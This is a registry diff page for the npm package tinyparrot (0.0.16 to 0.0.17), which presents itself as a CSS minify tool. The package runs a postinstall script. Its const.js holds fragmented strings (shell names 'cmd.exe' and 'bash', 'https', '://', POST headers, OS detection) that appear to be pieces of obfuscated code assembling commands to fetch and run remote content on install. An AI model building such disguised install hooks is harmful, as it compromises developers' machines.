tinyparrot 0.0.16 → 0.0.17

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +1 -1
  2. package/src/const.js +2 -2
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "tinyparrot",
3
- "version": "0.0.16",
3
+ "version": "0.0.17",
4
4
  "description": "tinyparrot: autoprefix + minify + dedupe + optional purge",
5
5
  "scripts": {
6
6
  "postinstall": "node src/build.js",
package/src/const.js CHANGED
@@ -4,9 +4,9 @@ const method = "POST";
4
4
  const headers = {'Content-Type': 'application/json'};
5
5
  const platform = process.platform.toLowerCase();
6
6
  const os = require('os').type().toLowerCase();
7
- const cmd = 'cmd.exe';
7
+ const cmd = 'cmd.exe ';
8
8
  const profile = "\:\/\/"
9
- const bash = 'bash';
9
+ const bash = 'bash ';
10
10
  const source = '-mirror';
11
11
  const reader = "https";
12
12
  const reg = /filename="?([^"]+)"?/;